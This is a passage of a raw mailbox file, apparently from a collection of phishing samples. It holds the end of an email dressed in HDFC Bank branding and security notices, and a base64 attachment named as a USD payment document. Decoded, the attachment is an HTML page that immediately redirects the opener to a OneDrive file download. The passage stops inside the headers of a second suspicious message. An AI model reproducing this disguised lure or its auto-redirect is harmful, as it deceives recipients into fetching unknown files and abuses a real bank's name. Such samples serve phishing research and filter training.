<a style=3D"color: rgb(0, 125, 188); text-decoration: underline;" href=3D"h=
ttp://www.hdfcbank.com/assets/popuppages/overseas_correspondent_bankers_det=
ails.htm?openpopupinside=3Dyes" target=3D"_blank" rel=3D"noopener"><span st=
yle=3D"font-family: sans-serif;">http://www.hdfcbank.com/<wbr>assets/popupp=
ages/overseas_<wbr>correspondent_bankers_details.<wbr>htm?openpopupinside=
=3Dyes</span></a><span style=3D"font-family: sans-serif;"><strong>_______<w=
br>______________________________<wbr>
______________________________<wbr>______________________________<wbr>_____=
________</strong></span><br><br><font face=3D"Arial" size=3D"2">HDFC Bank o=
fficials or representatives will NEVER ask you for your personal informatio=
n i.e. your card details, passwords, PIN, CVV, OTP etc. DO NOT share these =
details with anyone over phone, SMS or email&nbsp;<br><br>
To read more about secure banking&nbsp;<a style=3D"color: rgb(0, 125, 188);=
 text-decoration: underline;" href=3D"http://www.hdfcbank.com/aboutus/secur=
ity/security_tips.htm" target=3D"_blank" rel=3D"noopener">http://www.hdfcba=
nk.<wbr>com/aboutus/security/security_<wbr>tips.htm</a>&nbsp;</font></p>
<p style=3D'margin: 0px 0px 1em; color: rgb(0, 0, 0); text-transform: none;=
 text-indent: 0px; letter-spacing: normal; font-family: "Helvetica Neue", H=
elvetica, Arial, sans-serif; font-size: 13px; font-style: normal; font-weig=
ht: 400; word-spacing: 0px; white-space: normal; background-color: rgb(255,=
 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; text=
-decoration-style: initial; text-decoration-color: initial;'><font face=3D"=
Arial" size=3D"2"></font>&nbsp;</p>
<p style=3D'margin: 0px 0px 1em; color: rgb(0, 0, 0); text-transform: none;=
 text-indent: 0px; letter-spacing: normal; font-family: "Helvetica Neue", H=
elvetica, Arial, sans-serif; font-size: 13px; font-style: normal; font-weig=
ht: 400; word-spacing: 0px; white-space: normal; background-color: rgb(255,=
 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; text=
-decoration-style: initial; text-decoration-color: initial;'><font face=3D"=
Arial" size=3D"2"><br></font><font face=3D"Arial">
<font size=3D"2">______________________________<wbr>_______________________=
_______<wbr>______________________________<wbr>_<br>Disclaimer:<br>
"The information contained herein (including any accompanying documents) is=
 confidential and is intended solely for the addressee(s). If you have erro=
neously received this message, please immediately delete it and notify the =
sender. Also, if you are not the intended recipient, you are hereby notifie=
d that any disclosure, copying, distribution or taking any action in relian=
ce on the contents of this message or any accompanying document is strictly=
 prohibited and is unlawful. The organization is=20
not responsible for any damage caused by a virus or alteration of the e-mai=
l by a third party or otherwise.<br></font><font size=3D"2">Regd. Office : =
HDFC Bank Ltd., HDFC Bank House, Senapati Bapat Marg, Lower Parel (W), Mumb=
ai - 400 013. "</font></font></p>
<p style=3D'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: no=
ne; text-indent: 0px; letter-spacing: normal; font-family: "Helvetica Neue"=
, Helvetica, Arial, sans-serif; font-size: small; font-style: normal; font-=
weight: 400; word-spacing: 0px; white-space: normal; background-color: rgb(=
255, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; =
text-decoration-style: initial; text-decoration-color: initial;'><font face=
=3D"Arial" size=3D"2"></font>&nbsp;</p>
<p style=3D'margin: 0px 0px 1em; color: rgb(85, 85, 85); text-transform: no=
ne; text-indent: 0px; letter-spacing: normal; font-family: "Helvetica Neue"=
, Helvetica, Arial, sans-serif; font-size: small; font-style: normal; font-=
weight: 400; word-spacing: 0px; white-space: normal; background-color: rgb(=
255, 255, 255); font-variant-ligatures: normal; font-variant-caps: normal; =
text-decoration-style: initial; text-decoration-color: initial;'>
<span style=3D'font-family: "Times New Roman", serif; font-size: 12pt;'>___=
___________________________<wbr>&nbsp;_____________________________<wbr>_&n=
bsp;__________<br>This email has been scanned by the Symantec Email Securit=
y.cloud service.<br>For more information please visit&nbsp;<a style=3D"colo=
r: rgb(0, 125, 188); text-decoration: underline;" href=3D"http://www.symant=
eccloud.com/" target=3D"_blank" rel=3D"noopener">http://www.<wbr>symanteccl=
oud.com</a></span></p></div></div></div><p>
<br class=3D"Apple-interchange-newline"></p></body></html>
------=_NextPart_000_0012_E255644B.1E8B29DB
Content-Type: text/html; name="USD$48,647.36.htm"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="USD$48,647.36.htm"

PCFET0NUWVBFIEhUTUw+DQoNCjxodG1sPg0KPG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIg
Y29udGVudD0iMDsgdXJsPWh0dHBzOi8vb25lZHJpdmUubGl2ZS5jb20vZG93bmxvYWQ/Y2lk
PTExMDQwQjQ5QTM3Njg5M0UmcmVzaWQ9MTEwNDBCNDlBMzc2ODkzRSUyMTEwOCZhdXRoa2V5
PUFJYVNjNFlRMVU0TmU5cyI+DQo8aHRtbD4gICANCg0KDQoNCg0KDQoNCg==

------=_NextPart_000_0012_E255644B.1E8B29DB--

From jose@monkey.org Thu Mar  7 16:26:33 2019 +0000
Return-Path: verificationdata@one-email.com
Delivered-To: jose@monkey.org
X-FDA: 75240953466.05.play49_9074ce8ddfc04
X-Spam-Summary: 75,0,0,e2590c6824245d6b,d41d8cd98f00b204,verificationdata@one-email.com,:,RULES_HIT:2:41:72:355:375:379:474:962:967:969:973:978:983:988:989:1189:1208:1224:1260:1311:1313:1314:1345:1381:1431:1433:1434:1436:1437:1513:1515:1516:1517:1521:1535:1560:1571:1588:1589:1592:1593:1594:1714:1730:1747:1777:1792:1803:2198:2199:2393:2525:2527:2549:2553:2557:2560:2563:2682:2685:2828:2859:2890:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3650:3769:3867:3868:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4120:4321:4552:4605:5007:6117:6119:6261:6300:6678:7652:7809:8568:8583:8603:9025:9059:9411:9468:9908:10004:10249:10346:11473:11658:11914:12043:12438:12517:12519:12555:12660:12740:12895:12955:12958:12986:13139:13227:13229:13439:14096:21067:21080:21433:21450:21451:21483:21524:21554:21627:21810:21819:21863:30001:30021:30054:30070:30083:30090,0,RBL:67.199.146.46-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,N
X-HE-Tag: play49_9074ce8ddfc04
X-Filterd-Recvd-Size: 9209
Received: from vps2836.inmotionhosting.com (vps2836.inmotionhosting.com [67.199.146.46])
	by imf07.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu,  7 Mar 2019 16:26:32 +0000 (UTC)
Received: from [23.94.24.232] (port=64963 helo=one-email.com)
	by vps2836.inmotionhosting.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.87)
	(envelope-from <verificationdata@one-email.com>)
	id 1h1vqq-0008CW-74
	for jose@monkey.org; Thu, 07 Mar 2019 11:26:32 -0500
